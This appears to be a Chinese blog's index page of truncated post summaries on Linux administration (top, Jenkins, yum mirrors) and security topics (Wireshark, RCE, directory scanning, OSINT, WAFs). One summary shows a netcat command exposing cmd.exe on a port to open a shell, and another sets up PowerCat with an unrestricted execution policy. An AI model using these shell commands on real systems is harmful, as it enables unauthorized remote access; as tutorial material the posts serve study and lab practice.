才知几何

摘要： 第一步：通过top命令找到CPU消耗最厉害的进程PID 1 top 第二步：通过top -H -p 进程PID，找到好用厉害的线程PID 1 top -H -p 12345 第三步：通过printf '0x%x\n' 线程PID，将线程PID转换成16进制 1 printf '0x%x\n' 543 阅读全文

摘要： 准备JDK（11）环境：详见 Linux==>安装JDK 此处安装jdk11 安装最新版Jenkins # 扫描可用jenkins包 yum search jenkins # 安装jenkins yum -y install jenkins 配置jenkins使用的jdk 1 #修改启动的配置文件 阅读全文

摘要： 备份原来的源文件 cp etc/yum.repos.d/CentOS-Base.repo etc/yum.repos.d/CentOS-Base.repo.back 添加阿里源 wget -O /etc/yum.repos.d/CentOS-Base.repo http://mirrors.aliy 阅读全文

摘要： PowerCat： 1.下载地址：https://github/besimorhino/powercat 2.下载下来导入 Import-Module .\powercat.psl 3.如果提示未能加载指定模块，则可能是权限问题，输入如下代码 Set-ExecutionPolicy Unrestri 阅读全文

摘要： shell反弹 正向反弹：攻击机直接连接靶机 条件：攻击机与靶机需互相访问 eg：攻击机：192.168.3.27 靶机：192.168.3.29 1111是端口号 靶机执行： windows机器：nc -lvvp 1111 -e C:\Windows\System32\cmd.exe Linux机 阅读全文

摘要： 蓝队防守流量分析是必须技能 Wireshark流量分析工具： 实时抓取数据包并进行分析/对已获取的数据包进行流量分析 官网：https://www.wireshark.org/ 阅读全文

摘要： 远程代码执行（Remote Code Execute）（Remote Command Execute） RCE：可以让攻击者直接向后台服务器远程注入操作系统命令或者代码，进而达到控制后台系统。 远程系统命令执行 一般出现这种漏洞，是因为应用系统从设计上需要给用户提供制定的远程命令操作的借口，比如常见 阅读全文

摘要： 什么是目录扫描？ 扫描已部署网站的一些敏感文件。会导致数据库的用户名和密码、服务器的用户名和密码、数据库文件等 为什么会泄漏？ 配置不当问题 本地文件包含[local file inclusion(LFI)/PHP(header.php\common.php\footer.php\function. 阅读全文

摘要： 网络空间搜索引擎（OSINT Open source intelligence） 可以查找物联网所有硬件设备和软件程序。 如何扫描： 使用网络扫描工具：namp/zmap 方式：IP库/枚举 如何识别一个设备： 爬虫-url/ip-域名/开放端口/操作系统/物理地址/MAC地址/设别类型/ 实时威胁 阅读全文

摘要： WAF（Web Application Firewall）Web应用防火墙 主要作用：过滤HTTP/HTTPS的请求 可参考：modsevurity.cn功能介绍 SQL Injection（SQLi）：阻止SQL注入 Cross Site Scripting（XSS）：阻止跨站脚本攻击 Local 阅读全文